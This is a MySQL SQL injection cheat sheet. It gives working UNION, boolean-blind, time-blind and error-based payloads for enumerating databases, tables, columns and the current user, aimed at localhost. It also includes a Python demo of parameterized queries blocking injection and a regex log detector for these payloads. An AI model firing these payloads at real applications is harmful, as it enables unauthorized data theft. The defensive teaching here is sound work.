Basic SQL Injection Cheat Sheet: MySQL Edition
1. UNION injection
1.1 Number of columns (raise the number until the query errors; the last value that works is the column count)
http://localhost/?id=1' order by 3
1.2 Finding the columns that are echoed back
http://localhost/?id=-1' union all select 1,2,3
1.3 Listing database names
http://localhost/?id=-1' union all select 1,group_concat(schema_name),3 from information_schema.schemata
1.4 Listing table names
http://localhost/?id=-1' union all select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x<hex encoding of the target database name>
1.5 Listing column names
http://localhost/?id=-1' union all select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x<hex encoding of the target table name>
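The UNION payloads above only work because the application pastes the id parameter into the SQL text. The following Python snippet is an added example, not code from the original cheat sheet: it builds a constructed three-column table in an in-memory SQLite database (standing in for the MySQL table the payloads assume), shows the page's step 1.2 payload returning attacker-chosen rows through string interpolation, and shows the same input matching nothing once id is bound as a parameter. Because the demo's vulnerable query interpolates id as a bare number, the payload is used without the page's leading quote; table name, columns and data are assumptions of this example.

```python
import sqlite3


def make_db():
    """Constructed sample data: a three-column table standing in for the app's own."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE test (id INTEGER, name TEXT, email TEXT)")
    conn.executemany(
        "INSERT INTO test VALUES (?, ?, ?)",
        [(1, "alice", "alice@example.test"), (2, "bob", "bob@example.test")],
    )
    return conn


def lookup_vulnerable(conn, user_id):
    """Vulnerable: user_id becomes part of the SQL text, so a UNION ALL
    appended to it turns one SELECT into two and the second one's rows
    come back through the same echoed columns the cheat sheet uses."""
    sql = f"SELECT id, name, email FROM test WHERE id={user_id}"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, user_id):
    """Hardened: the driver binds user_id as data. The same payload is
    compared as a literal string against the id column and matches nothing;
    the SQL structure cannot change no matter what the string contains."""
    sql = "SELECT id, name, email FROM test WHERE id=?"
    return conn.execute(sql, (user_id,)).fetchall()


if __name__ == "__main__":
    conn = make_db()
    # The page's step 1.2 payload, minus the quote (numeric context in this demo).
    payload = "-1 union all select 1,2,3"
    print("vulnerable   :", lookup_vulnerable(conn, payload))    # [(1, 2, 3)]
    print("parameterized:", lookup_parameterized(conn, payload))  # []
    print("normal input :", lookup_parameterized(conn, "1"))
```

The hardened path returns the normal row for "1" because SQLite applies the column's numeric affinity to the bound value; a string that is not a well-formed number stays a string and matches no integer id. Parameter binding (or a prepared statement in MySQL) is the fix for every section of this sheet, since UNION, blind and error-based payloads all rely on altering the statement text.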
2. Boolean-based blind injection
2.1 Functions commonly used in boolean-based blind injection
1. ascii and ord
Return the ASCII code of a single character
2. left
left(a,b) takes the first b characters of a, counting from the left
Example: left(database(),1)>'s'
3. substr
substr(a,b,c) takes c characters of string a starting at position b (positions are counted from 1)
Example: ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101
4. mid
mid(a,b,c) takes c characters of string a starting at position b (same behaviour as substr)
5. regexp
select user() regexp '^ro' returns 0 or 1: 1 when the pattern matches, 0 when it does not
6. like
Usage: select user() like 'ro%'
2.2 Boolean-based blind injection payloads
1. Guess the length of the database name
http://localhost/?id=1' and length(database())=8
2. Guess the first letter of the first database name
http://localhost/?id=1' and ascii(substr((select schema_name from information_schema.schemata limit 0,1),1,1))=80
3. Guess the first letter of the first table name in a given database
http://localhost/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=80
4. Guess the first letter of the first column of a given table
http://localhost/?id=1' and ascii(substr((select column_name from information_schema.columns where table_name=0x<hex encoding of the table name> limit 0,1),1,1))=80
3. Time-based blind injection
http://localhost/?id=1' and if(ascii(substr(database(),1,1))=115,1,sleep(5))
if(condition,res1,res2): returns res1 when the condition is TRUE and res2 when it is FALSE
For the remaining statements, refer to the boolean-based blind injection section
4. Error-based injection
4.1 floor()
select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);
4.2 extractvalue()
select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));
4.3 updatexml()
select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));
4.4 geometrycollection()
select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));
4.5 multipoint()
select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));
4.6 polygon()
select * from test where id=1 and polygon((select * from(select * from(select user())a)b));
4.7 multipolygon()
select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));
4.8 linestring()
select * from test where id=1 and linestring((select * from(select * from(select user())a)b));
4.9 multilinestring()
select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));
4.10 exp()
select * from test where id=1 and exp(~(select * from(select user())a));
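Every payload in sections 2 through 4 leaves a recognisable token in the request: the information_schema lookups and UNION SELECT of section 1, the ascii(substr( and length(database()) probes of section 2, sleep( in section 3, and the extractvalue/updatexml/floor(rand(/geometry/exp(~ functions of section 4. The following detector is an added example, not part of the original cheat sheet: it percent-decodes and lowercases each request's query string, matches it against signatures derived only from the payloads on this page, and reports which technique family each hit belongs to. The access log lines are constructed for the example, and the signature set and log format are assumptions.

```python
import re

# Signatures grouped by the technique family they belong to on this sheet.
# They are matched against the decoded, lowercased query string.
SIGNATURES = {
    "union": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "schema-enum": re.compile(r"\binformation_schema\."),
    "boolean-blind": re.compile(
        r"\b(?:ascii|ord)\s*\(\s*(?:substr|mid|left)\s*\("
        r"|\blength\s*\(\s*database\s*\(\s*\)"
    ),
    "time-blind": re.compile(r"\bsleep\s*\(\s*\d"),
    "error-based": re.compile(
        r"\b(?:extractvalue|updatexml|geometrycollection|multipoint|polygon"
        r"|multipolygon|linestring|multilinestring)\s*\("
        r"|\bfloor\s*\(\s*rand\s*\("
        r"|\bexp\s*\(\s*~"
    ),
}

# Common Log Format request line: "GET /path?query HTTP/1.1"
REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')


def normalize(request_target):
    """Return the query string the way the database would finally see it:
    everything after the first '?' (urlsplit would drop a '#' and what
    follows it as a fragment), percent-decoded, '+' as space, lowercased."""
    query = request_target.partition("?")[2]
    from urllib.parse import unquote_plus
    return unquote_plus(query).lower()


def classify(request_target):
    """List the technique families whose signatures match this request."""
    q = normalize(request_target)
    return [family for family, pattern in SIGNATURES.items() if pattern.search(q)]


def scan_log(lines):
    """Yield (line number, families) for every request that matches a signature."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_LINE.search(line)
        if not m:
            continue
        families = classify(m.group(1))
        if families:
            hits.append((n, families))
    return hits


# Constructed sample log: one benign request, one column-count probe, one
# request per technique family from the sheet, and a benign false-positive check.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Mar/2024:09:14:02 +0000] "GET /?id=1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [12/Mar/2024:09:14:03 +0000] "GET /?id=1%27%20order%20by%203 HTTP/1.1" 200 512',
    '10.0.0.5 - - [12/Mar/2024:09:14:04 +0000] "GET /?id=-1%27%20union%20all%20select%201,group_concat(schema_name),3%20from%20information_schema.schemata HTTP/1.1" 200 640',
    '10.0.0.5 - - [12/Mar/2024:09:14:05 +0000] "GET /?id=1%27%20and%20length(database())=8 HTTP/1.1" 200 512',
    '10.0.0.5 - - [12/Mar/2024:09:14:06 +0000] "GET /?id=1%27and%20if(ascii(substr(database(),1,1))=115,1,sleep(5)) HTTP/1.1" 200 512',
    '10.0.0.5 - - [12/Mar/2024:09:14:11 +0000] "GET /?id=1%20and%20updatexml(1,concat(0x7e,(select%20user()),0x7e),1) HTTP/1.1" 500 231',
    '10.0.0.9 - - [12/Mar/2024:09:15:00 +0000] "GET /search?q=union+station HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for n, families in scan_log(SAMPLE_LOG):
        print(f"line {n}: {', '.join(families)}")
```

Two points a practitioner should take from the sample: the bare order by probe from section 1.1 is not flagged, because "order by" alone is far too common in legitimate traffic to be a useful signal on its own, and "union station" is not flagged either, since the union signature requires the following select. Decoding before matching matters: the same payloads arrive percent-encoded, and a detector that matches the raw request line misses them. This is a triage aid for logs and a complement to parameterized queries, not a substitute; case changes and inline comments inside a payload would defeat these literal patterns.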